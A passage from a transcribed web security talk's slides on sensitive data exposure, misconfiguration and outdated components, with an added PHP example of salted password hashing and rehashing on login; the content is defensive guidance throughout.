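    } catch (NotFound $e) {
        printf("user %d -> /accounts/%s: 404\n", $user['id'], $id);
    }
}
```

Passing `$hideExistence = true` collapses the 403 into a 404 for the cases where a distinguishable response would itself leak which IDs are valid, which is the "permission to even know this exists" point on slide 90.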
  • 93. Sensitive Data Exposure - CHANGELOG (screenshot)
  • 94. Sensitive Data Exposure – composer.lock (screenshot)
  • 95. Sensitive Data Exposure – composer.lock (screenshot)
  • 97. Sensitive Data Exposure – robots.txt (screenshot)
  • 98. Sensitive Data Exposure
        Private information that is stored, transmitted, or backed up in clear text (or with weak encryption):
        • Customer information
        • Credit card numbers
        • Credentials
  • 99. Security Misconfiguration & Components with Known Vulnerabilities
        Default accounts enabled; weak passwords
        • admin / admin
        Security configuration
        • Does SSH grant root access?
        • Are weak encryption keys used?
        Out-of-date software
        • Old versions with known issues
        • Are the versions exposed?
        • Unused software running (DROWN attack)
  • 100–102. Components with Known Vulnerabilities (screenshots)
  • 103. Protecting Against Sensitive Data Exposure, Security Misconfiguration, and Components with Known Vulnerabilities
         1. Keep software up-to-date
            • Install critical updates immediately
            • Install other updates regularly
  • 104. 2. Keep sensitive data out of web root
            • Files which provide version numbers: README, CHANGELOG, .git, composer.lock
            • Database credentials & API keys
            • Encryption keys
  • 105. 3. Use strong encryption
            • Encrypt with a strong private key
            • Encrypt backups and data-in-transit
            • Use strong hashing techniques for passwords
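The "strong hashing techniques for passwords" point from slide 105 using PHP's built-in `password_*` functions, as an added example that is not part of the slide deck. The sample passwords and the cost setting are constructed; the API calls are the standard ones.

```php
<?php
// Added example (not from the slides): storing and checking passwords with
// password_hash() / password_verify(), and upgrading old hashes on login.
declare(strict_types=1);

const HASH_ALGO    = PASSWORD_DEFAULT;   // bcrypt today; may move to a stronger algorithm in later PHP releases
const HASH_OPTIONS = ['cost' => 12];     // work factor, chosen so one hash takes a fraction of a second

// Store only the hash. It embeds the algorithm, cost and a random salt, so
// two users with the same password still get different hashes and a leaked
// table cannot be matched against a precomputed list.
function storePassword(string $plain): string
{
    return password_hash($plain, HASH_ALGO, HASH_OPTIONS);
}

// Verify, and if the stored hash was made with weaker settings than the
// current ones, replace it now that the plaintext is briefly available.
// The caller persists the updated $storedHash.
function checkPassword(string $plain, string &$storedHash): bool
{
    if (!password_verify($plain, $storedHash)) {
        return false;
    }
    if (password_needs_rehash($storedHash, HASH_ALGO, HASH_OPTIONS)) {
        $storedHash = storePassword($plain);
    }
    return true;
}

// Constructed walk-through.
$hash = storePassword('correct horse battery staple');
echo $hash, PHP_EOL;   // the "$2y$12$..." form: algorithm, cost and salt are all in the string

var_dump(checkPassword('correct horse battery staple', $hash));   // right password
var_dump(checkPassword('password', $hash));                       // wrong password

// Same input, two different hashes, because each call draws a fresh salt.
var_dump(storePassword('password') === storePassword('password'));

// A hash made with a lower cost is still accepted, then upgraded in place.
$old = password_hash('legacy pass', PASSWORD_BCRYPT, ['cost' => 4]);
var_dump(checkPassword('legacy pass', $old));
var_dump($old !== password_hash('legacy pass', PASSWORD_BCRYPT, ['cost' => 4]) && str_starts_with($old, '$2y$12$'));
```

Fast general-purpose digests such as MD5 or SHA-1 are the "weak" option the slide warns against: they are designed to be quick, which is the opposite of what a password store needs. `password_hash()` is deliberately slow and salted, and `password_needs_rehash()` lets the cost be raised over time without forcing every user to reset.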
  • 106. 4. Test your systems
            • Scan your systems with automated tools
            • Test critical components yourself: automated tests and manual tests
  • 107. Next Steps
         Test your own applications for vulnerabilities
         Learn more about security & ethical hacking
         Enter security competitions (like CtF)
         Stay informed
  • 109. Thanks! Slides & feedback: https://joind.in/17622. Colin O'Dell, @colinodell